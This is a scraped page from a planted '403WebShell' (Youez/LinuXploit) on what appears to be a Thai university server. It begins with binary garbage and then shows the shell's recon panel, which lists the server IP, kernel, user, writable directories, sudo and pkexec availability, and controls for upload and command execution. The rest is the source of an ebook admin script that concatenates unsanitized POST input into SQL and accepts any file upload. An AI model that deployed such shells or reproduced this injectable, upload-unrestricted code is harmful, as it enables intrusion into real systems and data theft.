h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/culture/ebook/pages/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/culture/ebook/pages/admin/title_add_db.php
<?ob_start();?>
<?php include 'check_mode_admin.php';?>
<?php include '../dbconnect.php';?>
<?php include 'header.php';?>
<?php
if ($_POST["submit"])
{
	$type_code = (isset($_POST["type_code"])) ? $_POST["type_code"] : '';
	$title_name = (isset($_POST["title_name"])) ? $_POST["title_name"] : '';
	$author = (isset($_POST["author"])) ? $_POST["author"] : '';
	$publisher = (isset($_POST["publisher"])) ? $_POST["publisher"] : '';
	$pub_year = (isset($_POST["pub_year"])) ? $_POST["pub_year"] : '';
	$callnumber = (isset($_POST["callnumber"])) ? $_POST["callnumber"] : '';	
	//$detail = (isset($_POST["detail"])) ? $_POST["detail"] : '';
	if(isset($_POST["detail"])) {
		if (phpversion() >= 5.4) {
			$detail = addslashes($_POST["detail"]);
		} else {
			$detail = $_POST["detail"];
		}
	} else {
		$detail = "";
	}
	//$keyword = (isset($_POST["keyword"])) ? $_POST["keyword"] : '';
	if(isset($_POST["keyword"])) {
		if (phpversion() >= 5.4) {
			$keyword = addslashes($_POST["keyword"]);
		} else {
			$keyword = $_POST["keyword"];
		}
	} else {
		$keyword = "";
	}
	if ($_FILES["picture"]["name"])
	{
		$picture = $_FILES["picture"]["name"];
	} else { //if ($_FILES["file_name"]["name"])
		$picture = "";
	}//if ($_FILES["file_name"]["name"])	

	if (($type_code<>"") && ($title_name<>"") )
	{
			//หา title_code
			$sql = "SELECT title_code FROM title ORDER BY title_code DESC";
			$query = mysqli_query($conn,$sql);	
			if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
				$new_title_code=$result["title_code"]+1;		
			} else {  //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
				$new_title_code=1;
			} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
				
			//บันทึกลงในตาราง title
			$sql = "INSERT INTO title ";
			$sql .="(title_code, title_name, type_code, detail, author, publisher, picture, pub_year, keyword, callnumber) ";
			$sql .="VALUES ";
			$sql .="(" . $new_title_code . " ";	
			$sql .=",'" . $title_name . "' ";
			$sql .="," . $type_code . " ";
			$sql .=",'" . $detail . "' ";
			$sql .=",'" . $author . "' ";			
			$sql .=",'" . $publisher . "' ";
			$sql .=",'" . $picture . "' ";			
			$sql .=",'" . $pub_year . "' ";
			$sql .=",'" . $keyword . "' ";
			$sql .=",'" . $callnumber . "') ";
			
			$query = mysqli_query($conn,$sql);
			
			if($query)
			{
				//อัพโหลดไฟล์รูป
				if($picture <> "") {
					$image_folder = "../titlepicture";
					//upload file
					if(move_uploaded_file($_FILES["picture"]["tmp_name"], $image_folder . "/" . $_FILES["picture"]["name"]))
					{
						//echo "บันทึกไฟล์เรียบร้อยแล้ว<BR>";
					}
					else  
					{
						echo "ไม่สามารถบันทึกไฟล์ได้<BR>";
					}		
				}
?>							
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="index.php"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการ</button></a>
<?php				
			}
			else
			{
				echo "ไม่สามารถบันทึกข้อมูลได้";
			}
	} else { //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))
?>	
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
	}  //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit